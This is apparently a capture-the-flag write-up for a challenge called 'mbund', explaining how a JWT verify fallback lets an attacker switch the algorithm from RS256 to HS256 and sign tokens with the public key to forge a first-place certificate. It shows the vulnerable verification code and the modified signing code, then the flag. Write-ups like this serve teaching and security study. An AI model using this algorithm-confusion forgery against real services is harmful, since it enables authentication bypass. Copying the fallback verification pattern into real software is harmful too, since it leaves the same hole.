mbund
export.zip
- source code
- By auditing the source code, we can find that program use
jwt
and one of the point ofjwt hack
is to replace thealg
value in order to passverify
function. - The fallback of
verify
function will let it passpublicKey
in text to verify.try { const result = await jose.jwtVerify( token, await jose.importSPKI(publicKey, "RS256") ); return result.payload as any; } catch (e) { try { const result = await jose.jwtVerify( token, new TextEncoder().encode(publicKey) ); return result.payload as any; } catch (e) {} }
- Therefore since we already have the
publicKey
which was used to verify signiture inRS256
, we can just simply change theRS256
inalg
toHS256
(the symmatric encryption version ofRS256
) and encrypt it bypublicKey
to bypass the verification. - Comment out the first-place check under
/api/certify
.// if (place === 1) { // return new Response( // "The grand winner must be manually signed by an admin.", // { status: 401 } // ); // }
- Change the code under
/api/certify
fromRS256
toHS256
:const token = await new jose.SignJWT({ team, place }) .setProtectedHeader({ alg: "HS256" }) .sign(new TextEncoder().encode(publicKey));
docker-compose up
the container on local, and generate a new cert PDF encrypted byHS256
andpublicKey
.- Done!
- 💯 Is this the reason you're in first place? bctf{47_l3457_17_w45n7_4n_4c7u4l_pdf_ch4ll3n63}